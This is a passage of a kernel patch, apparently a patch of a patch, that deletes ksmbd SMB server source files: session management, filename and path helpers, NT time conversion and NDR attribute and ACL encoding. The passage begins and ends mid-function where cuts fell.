+-			ksmbd_session_destroy(sess);
+-			continue;
+-		}
+-	}
+-	up_write(&sessions_table_lock);
+-}
+-
+-int ksmbd_session_register(struct ksmbd_conn *conn,
+-			   struct ksmbd_session *sess)
+-{
+-	sess->dialect = conn->dialect;
+-	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
+-	ksmbd_expire_session(conn);
+-	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
+-}
+-
+-static int ksmbd_chann_del(struct ksmbd_conn *conn, struct ksmbd_session *sess)
+-{
+-	struct channel *chann;
+-
+-	chann = xa_erase(&sess->ksmbd_chann_list, (long)conn);
+-	if (!chann)
+-		return -ENOENT;
+-
+-	kfree(chann);
+-	return 0;
+-}
+-
+-void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+-{
+-	struct ksmbd_session *sess;
+-	unsigned long id;
+-
+-	down_write(&sessions_table_lock);
+-	if (conn->binding) {
+-		int bkt;
+-		struct hlist_node *tmp;
+-
+-		hash_for_each_safe(sessions_table, bkt, tmp, sess, hlist) {
+-			if (!ksmbd_chann_del(conn, sess) &&
+-			    xa_empty(&sess->ksmbd_chann_list)) {
+-				hash_del(&sess->hlist);
+-				ksmbd_session_destroy(sess);
+-			}
+-		}
+-	}
+-
+-	xa_for_each(&conn->sessions, id, sess) {
+-		unsigned long chann_id;
+-		struct channel *chann;
+-
+-		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
+-			if (chann->conn != conn)
+-				ksmbd_conn_set_exiting(chann->conn);
+-		}
+-
+-		ksmbd_chann_del(conn, sess);
+-		if (xa_empty(&sess->ksmbd_chann_list)) {
+-			xa_erase(&conn->sessions, sess->id);
+-			hash_del(&sess->hlist);
+-			ksmbd_session_destroy(sess);
+-		}
+-	}
+-	up_write(&sessions_table_lock);
+-}
+-
+-struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+-					   unsigned long long id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	sess = xa_load(&conn->sessions, id);
+-	if (sess)
+-		sess->last_active = jiffies;
+-	return sess;
+-}
+-
+-struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	down_read(&sessions_table_lock);
+-	sess = __session_lookup(id);
+-	if (sess)
+-		sess->last_active = jiffies;
+-	up_read(&sessions_table_lock);
+-
+-	return sess;
+-}
+-
+-struct ksmbd_session *ksmbd_session_lookup_all(struct ksmbd_conn *conn,
+-					       unsigned long long id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	sess = ksmbd_session_lookup(conn, id);
+-	if (!sess && conn->binding)
+-		sess = ksmbd_session_lookup_slowpath(id);
+-	if (sess && sess->state != SMB2_SESSION_VALID)
+-		sess = NULL;
+-	return sess;
+-}
+-
+-struct preauth_session *ksmbd_preauth_session_alloc(struct ksmbd_conn *conn,
+-						    u64 sess_id)
+-{
+-	struct preauth_session *sess;
+-
+-	sess = kmalloc(sizeof(struct preauth_session), GFP_KERNEL);
+-	if (!sess)
+-		return NULL;
+-
+-	sess->id = sess_id;
+-	memcpy(sess->Preauth_HashValue, conn->preauth_info->Preauth_HashValue,
+-	       PREAUTH_HASHVALUE_SIZE);
+-	list_add(&sess->preauth_entry, &conn->preauth_sess_table);
+-
+-	return sess;
+-}
+-
+-static bool ksmbd_preauth_session_id_match(struct preauth_session *sess,
+-					   unsigned long long id)
+-{
+-	return sess->id == id;
+-}
+-
+-struct preauth_session *ksmbd_preauth_session_lookup(struct ksmbd_conn *conn,
+-						     unsigned long long id)
+-{
+-	struct preauth_session *sess = NULL;
+-
+-	list_for_each_entry(sess, &conn->preauth_sess_table, preauth_entry) {
+-		if (ksmbd_preauth_session_id_match(sess, id))
+-			return sess;
+-	}
+-	return NULL;
+-}
+-
+-static int __init_smb2_session(struct ksmbd_session *sess)
+-{
+-	int id = ksmbd_acquire_smb2_uid(&session_ida);
+-
+-	if (id < 0)
+-		return -EINVAL;
+-	sess->id = id;
+-	return 0;
+-}
+-
+-static struct ksmbd_session *__session_create(int protocol)
+-{
+-	struct ksmbd_session *sess;
+-	int ret;
+-
+-	if (protocol != CIFDS_SESSION_FLAG_SMB2)
+-		return NULL;
+-
+-	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
+-	if (!sess)
+-		return NULL;
+-
+-	if (ksmbd_init_file_table(&sess->file_table))
+-		goto error;
+-
+-	sess->last_active = jiffies;
+-	sess->state = SMB2_SESSION_IN_PROGRESS;
+-	set_session_flag(sess, protocol);
+-	xa_init(&sess->tree_conns);
+-	xa_init(&sess->ksmbd_chann_list);
+-	INIT_LIST_HEAD(&sess->rpc_handle_list);
+-	sess->sequence_number = 1;
+-
+-	ret = __init_smb2_session(sess);
+-	if (ret)
+-		goto error;
+-
+-	ida_init(&sess->tree_conn_ida);
+-
+-	down_write(&sessions_table_lock);
+-	hash_add(sessions_table, &sess->hlist, sess->id);
+-	up_write(&sessions_table_lock);
+-
+-	return sess;
+-
+-error:
+-	ksmbd_session_destroy(sess);
+-	return NULL;
+-}
+-
+-struct ksmbd_session *ksmbd_smb2_session_create(void)
+-{
+-	return __session_create(CIFDS_SESSION_FLAG_SMB2);
+-}
+-
+-int ksmbd_acquire_tree_conn_id(struct ksmbd_session *sess)
+-{
+-	int id = -EINVAL;
+-
+-	if (test_session_flag(sess, CIFDS_SESSION_FLAG_SMB2))
+-		id = ksmbd_acquire_smb2_tid(&sess->tree_conn_ida);
+-
+-	return id;
+-}
+-
+-void ksmbd_release_tree_conn_id(struct ksmbd_session *sess, int id)
+-{
+-	if (id >= 0)
+-		ksmbd_release_id(&sess->tree_conn_ida, id);
+-}
+diff --git a/fs/ksmbd/mgmt/user_session.h b/fs/ksmbd/mgmt/user_session.h
+deleted file mode 100644
+index 51f38e5b61abb..0000000000000
+--- a/fs/ksmbd/mgmt/user_session.h
++++ /dev/null
+@@ -1,103 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __USER_SESSION_MANAGEMENT_H__
+-#define __USER_SESSION_MANAGEMENT_H__
+-
+-#include <linux/hashtable.h>
+-#include <linux/xarray.h>
+-
+-#include "../smb_common.h"
+-#include "../ntlmssp.h"
+-
+-#define CIFDS_SESSION_FLAG_SMB2		BIT(1)
+-
+-#define PREAUTH_HASHVALUE_SIZE		64
+-
+-struct ksmbd_file_table;
+-
+-struct channel {
+-	__u8			smb3signingkey[SMB3_SIGN_KEY_SIZE];
+-	struct ksmbd_conn	*conn;
+-};
+-
+-struct preauth_session {
+-	__u8			Preauth_HashValue[PREAUTH_HASHVALUE_SIZE];
+-	u64			id;
+-	struct list_head	preauth_entry;
+-};
+-
+-struct ksmbd_session {
+-	u64				id;
+-
+-	__u16				dialect;
+-	char				ClientGUID[SMB2_CLIENT_GUID_SIZE];
+-
+-	struct ksmbd_user		*user;
+-	unsigned int			sequence_number;
+-	unsigned int			flags;
+-
+-	bool				sign;
+-	bool				enc;
+-	bool				is_anonymous;
+-
+-	int				state;
+-	__u8				*Preauth_HashValue;
+-
+-	char				sess_key[CIFS_KEY_SIZE];
+-
+-	struct hlist_node		hlist;
+-	struct xarray			ksmbd_chann_list;
+-	struct xarray			tree_conns;
+-	struct ida			tree_conn_ida;
+-	struct list_head		rpc_handle_list;
+-
+-	__u8				smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+-	__u8				smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+-	__u8				smb3signingkey[SMB3_SIGN_KEY_SIZE];
+-
+-	struct ksmbd_file_table		file_table;
+-	unsigned long			last_active;
+-};
+-
+-static inline int test_session_flag(struct ksmbd_session *sess, int bit)
+-{
+-	return sess->flags & bit;
+-}
+-
+-static inline void set_session_flag(struct ksmbd_session *sess, int bit)
+-{
+-	sess->flags |= bit;
+-}
+-
+-static inline void clear_session_flag(struct ksmbd_session *sess, int bit)
+-{
+-	sess->flags &= ~bit;
+-}
+-
+-struct ksmbd_session *ksmbd_smb2_session_create(void);
+-
+-void ksmbd_session_destroy(struct ksmbd_session *sess);
+-
+-struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id);
+-struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+-					   unsigned long long id);
+-int ksmbd_session_register(struct ksmbd_conn *conn,
+-			   struct ksmbd_session *sess);
+-void ksmbd_sessions_deregister(struct ksmbd_conn *conn);
+-struct ksmbd_session *ksmbd_session_lookup_all(struct ksmbd_conn *conn,
+-					       unsigned long long id);
+-struct preauth_session *ksmbd_preauth_session_alloc(struct ksmbd_conn *conn,
+-						    u64 sess_id);
+-struct preauth_session *ksmbd_preauth_session_lookup(struct ksmbd_conn *conn,
+-						     unsigned long long id);
+-
+-int ksmbd_acquire_tree_conn_id(struct ksmbd_session *sess);
+-void ksmbd_release_tree_conn_id(struct ksmbd_session *sess, int id);
+-
+-int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name);
+-void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id);
+-int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id);
+-#endif /* __USER_SESSION_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/misc.c b/fs/ksmbd/misc.c
+deleted file mode 100644
+index 9e8afaa686e3a..0000000000000
+--- a/fs/ksmbd/misc.c
++++ /dev/null
+@@ -1,381 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/kernel.h>
+-#include <linux/xattr.h>
+-#include <linux/fs.h>
+-#include <linux/unicode.h>
+-
+-#include "misc.h"
+-#include "smb_common.h"
+-#include "connection.h"
+-#include "vfs.h"
+-
+-#include "mgmt/share_config.h"
+-
+-/**
+- * match_pattern() - compare a string with a pattern which might include
+- * wildcard '*' and '?'
+- * TODO : implement consideration about DOS_DOT, DOS_QM and DOS_STAR
+- *
+- * @str:	string to compare with a pattern
+- * @len:	string length
+- * @pattern:	pattern string which might include wildcard '*' and '?'
+- *
+- * Return:	0 if pattern matched with the string, otherwise non zero value
+- */
+-int match_pattern(const char *str, size_t len, const char *pattern)
+-{
+-	const char *s = str;
+-	const char *p = pattern;
+-	bool star = false;
+-
+-	while (*s && len) {
+-		switch (*p) {
+-		case '?':
+-			s++;
+-			len--;
+-			p++;
+-			break;
+-		case '*':
+-			star = true;
+-			str = s;
+-			if (!*++p)
+-				return true;
+-			pattern = p;
+-			break;
+-		default:
+-			if (tolower(*s) == tolower(*p)) {
+-				s++;
+-				len--;
+-				p++;
+-			} else {
+-				if (!star)
+-					return false;
+-				str++;
+-				s = str;
+-				p = pattern;
+-			}
+-			break;
+-		}
+-	}
+-
+-	if (*p == '*')
+-		++p;
+-	return !*p;
+-}
+-
+-/*
+- * is_char_allowed() - check for valid character
+- * @ch:		input character to be checked
+- *
+- * Return:	1 if char is allowed, otherwise 0
+- */
+-static inline int is_char_allowed(char ch)
+-{
+-	/* check for control chars, wildcards etc. */
+-	if (!(ch & 0x80) &&
+-	    (ch <= 0x1f ||
+-	     ch == '?' || ch == '"' || ch == '<' ||
+-	     ch == '>' || ch == '|' || ch == '*'))
+-		return 0;
+-
+-	return 1;
+-}
+-
+-int ksmbd_validate_filename(char *filename)
+-{
+-	while (*filename) {
+-		char c = *filename;
+-
+-		filename++;
+-		if (!is_char_allowed(c)) {
+-			ksmbd_debug(VFS, "File name validation failed: 0x%x\n", c);
+-			return -ENOENT;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-static int ksmbd_validate_stream_name(char *stream_name)
+-{
+-	while (*stream_name) {
+-		char c = *stream_name;
+-
+-		stream_name++;
+-		if (c == '/' || c == ':' || c == '\\') {
+-			pr_err("Stream name validation failed: %c\n", c);
+-			return -ENOENT;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-int parse_stream_name(char *filename, char **stream_name, int *s_type)
+-{
+-	char *stream_type;
+-	char *s_name;
+-	int rc = 0;
+-
+-	s_name = filename;
+-	filename = strsep(&s_name, ":");
+-	ksmbd_debug(SMB, "filename : %s, streams : %s\n", filename, s_name);
+-	if (strchr(s_name, ':')) {
+-		stream_type = s_name;
+-		s_name = strsep(&stream_type, ":");
+-
+-		rc = ksmbd_validate_stream_name(s_name);
+-		if (rc < 0) {
+-			rc = -ENOENT;
+-			goto out;
+-		}
+-
+-		ksmbd_debug(SMB, "stream name : %s, stream type : %s\n", s_name,
+-			    stream_type);
+-		if (!strncasecmp("$data", stream_type, 5))
+-			*s_type = DATA_STREAM;
+-		else if (!strncasecmp("$index_allocation", stream_type, 17))
+-			*s_type = DIR_STREAM;
+-		else
+-			rc = -ENOENT;
+-	}
+-
+-	*stream_name = s_name;
+-out:
+-	return rc;
+-}
+-
+-/**
+- * convert_to_nt_pathname() - extract and return windows path string
+- *      whose share directory prefix was removed from file path
+- * @share: ksmbd_share_config pointer
+- * @path: path to report
+- *
+- * Return : windows path string or error
+- */
+-
+-char *convert_to_nt_pathname(struct ksmbd_share_config *share,
+-			     const struct path *path)
+-{
+-	char *pathname, *ab_pathname, *nt_pathname;
+-	int share_path_len = share->path_sz;
+-
+-	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!pathname)
+-		return ERR_PTR(-EACCES);
+-
+-	ab_pathname = d_path(path, pathname, PATH_MAX);
+-	if (IS_ERR(ab_pathname)) {
+-		nt_pathname = ERR_PTR(-EACCES);
+-		goto free_pathname;
+-	}
+-
+-	if (strncmp(ab_pathname, share->path, share_path_len)) {
+-		nt_pathname = ERR_PTR(-EACCES);
+-		goto free_pathname;
+-	}
+-
+-	nt_pathname = kzalloc(strlen(&ab_pathname[share_path_len]) + 2, GFP_KERNEL);
+-	if (!nt_pathname) {
+-		nt_pathname = ERR_PTR(-ENOMEM);
+-		goto free_pathname;
+-	}
+-	if (ab_pathname[share_path_len] == '\0')
+-		strcpy(nt_pathname, "/");
+-	strcat(nt_pathname, &ab_pathname[share_path_len]);
+-
+-	ksmbd_conv_path_to_windows(nt_pathname);
+-
+-free_pathname:
+-	kfree(pathname);
+-	return nt_pathname;
+-}
+-
+-int get_nlink(struct kstat *st)
+-{
+-	int nlink;
+-
+-	nlink = st->nlink;
+-	if (S_ISDIR(st->mode))
+-		nlink--;
+-
+-	return nlink;
+-}
+-
+-void ksmbd_conv_path_to_unix(char *path)
+-{
+-	strreplace(path, '\\', '/');
+-}
+-
+-void ksmbd_strip_last_slash(char *path)
+-{
+-	int len = strlen(path);
+-
+-	while (len && path[len - 1] == '/') {
+-		path[len - 1] = '\0';
+-		len--;
+-	}
+-}
+-
+-void ksmbd_conv_path_to_windows(char *path)
+-{
+-	strreplace(path, '/', '\\');
+-}
+-
+-char *ksmbd_casefold_sharename(struct unicode_map *um, const char *name)
+-{
+-	char *cf_name;
+-	int cf_len;
+-
+-	cf_name = kzalloc(KSMBD_REQ_MAX_SHARE_NAME, GFP_KERNEL);
+-	if (!cf_name)
+-		return ERR_PTR(-ENOMEM);
+-
+-	if (IS_ENABLED(CONFIG_UNICODE) && um) {
+-		const struct qstr q_name = {.name = name, .len = strlen(name)};
+-
+-		cf_len = utf8_casefold(um, &q_name, cf_name,
+-				       KSMBD_REQ_MAX_SHARE_NAME);
+-		if (cf_len < 0)
+-			goto out_ascii;
+-
+-		return cf_name;
+-	}
+-
+-out_ascii:
+-	cf_len = strscpy(cf_name, name, KSMBD_REQ_MAX_SHARE_NAME);
+-	if (cf_len < 0) {
+-		kfree(cf_name);
+-		return ERR_PTR(-E2BIG);
+-	}
+-
+-	for (; *cf_name; ++cf_name)
+-		*cf_name = isascii(*cf_name) ? tolower(*cf_name) : *cf_name;
+-	return cf_name - cf_len;
+-}
+-
+-/**
+- * ksmbd_extract_sharename() - get share name from tree connect request
+- * @treename:	buffer containing tree name and share name
+- *
+- * Return:      share name on success, otherwise error
+- */
+-char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename)
+-{
+-	const char *name = treename, *pos = strrchr(name, '\\');
+-
+-	if (pos)
+-		name = (pos + 1);
+-
+-	/* caller has to free the memory */
+-	return ksmbd_casefold_sharename(um, name);
+-}
+-
+-/**
+- * convert_to_unix_name() - convert windows name to unix format
+- * @share:	ksmbd_share_config pointer
+- * @name:	file name that is relative to share
+- *
+- * Return:	converted name on success, otherwise NULL
+- */
+-char *convert_to_unix_name(struct ksmbd_share_config *share, const char *name)
+-{
+-	int no_slash = 0, name_len, path_len;
+-	char *new_name;
+-
+-	if (name[0] == '/')
+-		name++;
+-
+-	path_len = share->path_sz;
+-	name_len = strlen(name);
+-	new_name = kmalloc(path_len + name_len + 2, GFP_KERNEL);
+-	if (!new_name)
+-		return new_name;
+-
+-	memcpy(new_name, share->path, path_len);
+-	if (new_name[path_len - 1] != '/') {
+-		new_name[path_len] = '/';
+-		no_slash = 1;
+-	}
+-
+-	memcpy(new_name + path_len + no_slash, name, name_len);
+-	path_len += name_len + no_slash;
+-	new_name[path_len] = 0x00;
+-	return new_name;
+-}
+-
+-char *ksmbd_convert_dir_info_name(struct ksmbd_dir_info *d_info,
+-				  const struct nls_table *local_nls,
+-				  int *conv_len)
+-{
+-	char *conv;
+-	int  sz = min(4 * d_info->name_len, PATH_MAX);
+-
+-	if (!sz)
+-		return NULL;
+-
+-	conv = kmalloc(sz, GFP_KERNEL);
+-	if (!conv)
+-		return NULL;
+-
+-	/* XXX */
+-	*conv_len = smbConvertToUTF16((__le16 *)conv, d_info->name,
+-				      d_info->name_len, local_nls, 0);
+-	*conv_len *= 2;
+-
+-	/* We allocate buffer twice bigger than needed. */
+-	conv[*conv_len] = 0x00;
+-	conv[*conv_len + 1] = 0x00;
+-	return conv;
+-}
+-
+-/*
+- * Convert the NT UTC (based 1601-01-01, in hundred nanosecond units)
+- * into Unix UTC (based 1970-01-01, in seconds).
+- */
+-struct timespec64 ksmbd_NTtimeToUnix(__le64 ntutc)
+-{
+-	struct timespec64 ts;
+-
+-	/* Subtract the NTFS time offset, then convert to 1s intervals. */
+-	s64 t = le64_to_cpu(ntutc) - NTFS_TIME_OFFSET;
+-	u64 abs_t;
+-
+-	/*
+-	 * Unfortunately can not use normal 64 bit division on 32 bit arch, but
+-	 * the alternative, do_div, does not work with negative numbers so have
+-	 * to special case them
+-	 */
+-	if (t < 0) {
+-		abs_t = -t;
+-		ts.tv_nsec = do_div(abs_t, 10000000) * 100;
+-		ts.tv_nsec = -ts.tv_nsec;
+-		ts.tv_sec = -abs_t;
+-	} else {
+-		abs_t = t;
+-		ts.tv_nsec = do_div(abs_t, 10000000) * 100;
+-		ts.tv_sec = abs_t;
+-	}
+-
+-	return ts;
+-}
+-
+-/* Convert the Unix UTC into NT UTC. */
+-inline u64 ksmbd_UnixTimeToNT(struct timespec64 t)
+-{
+-	/* Convert to 100ns intervals and then add the NTFS time offset. */
+-	return (u64)t.tv_sec * 10000000 + t.tv_nsec / 100 + NTFS_TIME_OFFSET;
+-}
+-
+-inline long long ksmbd_systime(void)
+-{
+-	struct timespec64	ts;
+-
+-	ktime_get_real_ts64(&ts);
+-	return ksmbd_UnixTimeToNT(ts);
+-}
+diff --git a/fs/ksmbd/misc.h b/fs/ksmbd/misc.h
+deleted file mode 100644
+index 1facfcd21200f..0000000000000
+--- a/fs/ksmbd/misc.h
++++ /dev/null
+@@ -1,37 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_MISC_H__
+-#define __KSMBD_MISC_H__
+-
+-struct ksmbd_share_config;
+-struct nls_table;
+-struct kstat;
+-struct ksmbd_file;
+-
+-int match_pattern(const char *str, size_t len, const char *pattern);
+-int ksmbd_validate_filename(char *filename);
+-int parse_stream_name(char *filename, char **stream_name, int *s_type);
+-char *convert_to_nt_pathname(struct ksmbd_share_config *share,
+-			     const struct path *path);
+-int get_nlink(struct kstat *st);
+-void ksmbd_conv_path_to_unix(char *path);
+-void ksmbd_strip_last_slash(char *path);
+-void ksmbd_conv_path_to_windows(char *path);
+-char *ksmbd_casefold_sharename(struct unicode_map *um, const char *name);
+-char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename);
+-char *convert_to_unix_name(struct ksmbd_share_config *share, const char *name);
+-
+-#define KSMBD_DIR_INFO_ALIGNMENT	8
+-struct ksmbd_dir_info;
+-char *ksmbd_convert_dir_info_name(struct ksmbd_dir_info *d_info,
+-				  const struct nls_table *local_nls,
+-				  int *conv_len);
+-
+-#define NTFS_TIME_OFFSET	((u64)(369 * 365 + 89) * 24 * 3600 * 10000000)
+-struct timespec64 ksmbd_NTtimeToUnix(__le64 ntutc);
+-u64 ksmbd_UnixTimeToNT(struct timespec64 t);
+-long long ksmbd_systime(void);
+-#endif /* __KSMBD_MISC_H__ */
+diff --git a/fs/ksmbd/ndr.c b/fs/ksmbd/ndr.c
+deleted file mode 100644
+index 4d9e0b54e3dbf..0000000000000
+--- a/fs/ksmbd/ndr.c
++++ /dev/null
+@@ -1,514 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2021 Samsung Electronics Co., Ltd.
+- *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
+- */
+-
+-#include <linux/fs.h>
+-
+-#include "glob.h"
+-#include "ndr.h"
+-
+-static inline char *ndr_get_field(struct ndr *n)
+-{
+-	return n->data + n->offset;
+-}
+-
+-static int try_to_realloc_ndr_blob(struct ndr *n, size_t sz)
+-{
+-	char *data;
+-
+-	data = krealloc(n->data, n->offset + sz + 1024, GFP_KERNEL);
+-	if (!data)
+-		return -ENOMEM;
+-
+-	n->data = data;
+-	n->length += 1024;
+-	memset(n->data + n->offset, 0, 1024);
+-	return 0;
+-}
+-
+-static int ndr_write_int16(struct ndr *n, __u16 value)
+-{
+-	if (n->length <= n->offset + sizeof(value)) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sizeof(value));
+-		if (ret)
+-			return ret;
+-	}
+-
+-	*(__le16 *)ndr_get_field(n) = cpu_to_le16(value);
+-	n->offset += sizeof(value);
+-	return 0;
+-}
+-
+-static int ndr_write_int32(struct ndr *n, __u32 value)
+-{
+-	if (n->length <= n->offset + sizeof(value)) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sizeof(value));
+-		if (ret)
+-			return ret;
+-	}
+-
+-	*(__le32 *)ndr_get_field(n) = cpu_to_le32(value);
+-	n->offset += sizeof(value);
+-	return 0;
+-}
+-
+-static int ndr_write_int64(struct ndr *n, __u64 value)
+-{
+-	if (n->length <= n->offset + sizeof(value)) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sizeof(value));
+-		if (ret)
+-			return ret;
+-	}
+-
+-	*(__le64 *)ndr_get_field(n) = cpu_to_le64(value);
+-	n->offset += sizeof(value);
+-	return 0;
+-}
+-
+-static int ndr_write_bytes(struct ndr *n, void *value, size_t sz)
+-{
+-	if (n->length <= n->offset + sz) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sz);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	memcpy(ndr_get_field(n), value, sz);
+-	n->offset += sz;
+-	return 0;
+-}
+-
+-static int ndr_write_string(struct ndr *n, char *value)
+-{
+-	size_t sz;
+-
+-	sz = strlen(value) + 1;
+-	if (n->length <= n->offset + sz) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sz);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	memcpy(ndr_get_field(n), value, sz);
+-	n->offset += sz;
+-	n->offset = ALIGN(n->offset, 2);
+-	return 0;
+-}
+-
+-static int ndr_read_string(struct ndr *n, void *value, size_t sz)
+-{
+-	int len;
+-
+-	if (n->offset + sz > n->length)
+-		return -EINVAL;
+-
+-	len = strnlen(ndr_get_field(n), sz);
+-	if (value)
+-		memcpy(value, ndr_get_field(n), len);
+-	len++;
+-	n->offset += len;
+-	n->offset = ALIGN(n->offset, 2);
+-	return 0;
+-}
+-
+-static int ndr_read_bytes(struct ndr *n, void *value, size_t sz)
+-{
+-	if (n->offset + sz > n->length)
+-		return -EINVAL;
+-
+-	if (value)
+-		memcpy(value, ndr_get_field(n), sz);
+-	n->offset += sz;
+-	return 0;
+-}
+-
+-static int ndr_read_int16(struct ndr *n, __u16 *value)
+-{
+-	if (n->offset + sizeof(__u16) > n->length)
+-		return -EINVAL;
+-
+-	if (value)
+-		*value = le16_to_cpu(*(__le16 *)ndr_get_field(n));
+-	n->offset += sizeof(__u16);
+-	return 0;
+-}
+-
+-static int ndr_read_int32(struct ndr *n, __u32 *value)
+-{
+-	if (n->offset + sizeof(__u32) > n->length)
+-		return -EINVAL;
+-
+-	if (value)
+-		*value = le32_to_cpu(*(__le32 *)ndr_get_field(n));
+-	n->offset += sizeof(__u32);
+-	return 0;
+-}
+-
+-static int ndr_read_int64(struct ndr *n, __u64 *value)
+-{
+-	if (n->offset + sizeof(__u64) > n->length)
+-		return -EINVAL;
+-
+-	if (value)
+-		*value = le64_to_cpu(*(__le64 *)ndr_get_field(n));
+-	n->offset += sizeof(__u64);
+-	return 0;
+-}
+-
+-int ndr_encode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
+-{
+-	char hex_attr[12] = {0};
+-	int ret;
+-
+-	n->offset = 0;
+-	n->length = 1024;
+-	n->data = kzalloc(n->length, GFP_KERNEL);
+-	if (!n->data)
+-		return -ENOMEM;
+-
+-	if (da->version == 3) {
+-		snprintf(hex_attr, 10, "0x%x", da->attr);
+-		ret = ndr_write_string(n, hex_attr);
+-	} else {
+-		ret = ndr_write_string(n, "");
+-	}
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int16(n, da->version);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, da->version);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, da->flags);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, da->attr);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version == 3) {
+-		ret = ndr_write_int32(n, da->ea_size);
+-		if (ret)
+-			return ret;
+-		ret = ndr_write_int64(n, da->size);
+-		if (ret)
+-			return ret;
+-		ret = ndr_write_int64(n, da->alloc_size);
+-	} else {
+-		ret = ndr_write_int64(n, da->itime);
+-	}
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int64(n, da->create_time);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version == 3)
+-		ret = ndr_write_int64(n, da->change_time);
+-	return ret;
+-}
+-
+-int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
+-{
+-	char hex_attr[12];
+-	unsigned int version2;
+-	int ret;
+-
+-	n->offset = 0;
+-	ret = ndr_read_string(n, hex_attr, sizeof(hex_attr));
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_read_int16(n, &da->version);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version != 3 && da->version != 4) {
+-		ksmbd_debug(VFS, "v%d version is not supported\n", da->version);
+-		return -EINVAL;
+-	}
+-
+-	ret = ndr_read_int32(n, &version2);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version != version2) {
+-		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
+-		       da->version, version2);
+-		return -EINVAL;
+-	}
+-
+-	ret = ndr_read_int32(n, NULL);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_read_int32(n, &da->attr);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version == 4) {
+-		ret = ndr_read_int64(n, &da->itime);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, &da->create_time);
+-	} else {
+-		ret = ndr_read_int32(n, NULL);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, NULL);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, NULL);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, &da->create_time);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, NULL);
+-	}
+-
+-	return ret;
+-}
+-
+-static int ndr_encode_posix_acl_entry(struct ndr *n, struct xattr_smb_acl *acl)
+-{
+-	int i, ret;
+-
+-	ret = ndr_write_int32(n, acl->count);
+-	if (ret)
+-		return ret;
+-
+-	n->offset = ALIGN(n->offset, 8);
+-	ret = ndr_write_int32(n, acl->count);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, 0);
+-	if (ret)
+-		return ret;
+-
+-	for (i = 0; i < acl->count; i++) {
+-		n->offset = ALIGN(n->offset, 8);
+-		ret = ndr_write_int16(n, acl->entries[i].type);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_write_int16(n, acl->entries[i].type);
+-		if (ret)
+-			return ret;
+-
+-		if (acl->entries[i].type == SMB_ACL_USER) {
+-			n->offset = ALIGN(n->offset, 8);
+-			ret = ndr_write_int64(n, acl->entries[i].uid);
+-		} else if (acl->entries[i].type == SMB_ACL_GROUP) {
+-			n->offset = ALIGN(n->offset, 8);
+-			ret = ndr_write_int64(n, acl->entries[i].gid);
+-		}
+-		if (ret)
+-			return ret;
+-
+-		/* push permission */
+-		ret = ndr_write_int32(n, acl->entries[i].perm);
+-	}
+-
+-	return ret;
+-}
+-
+-int ndr_encode_posix_acl(struct ndr *n,
+-			 struct user_namespace *user_ns,
+-			 struct inode *inode,
+-			 struct xattr_smb_acl *acl,
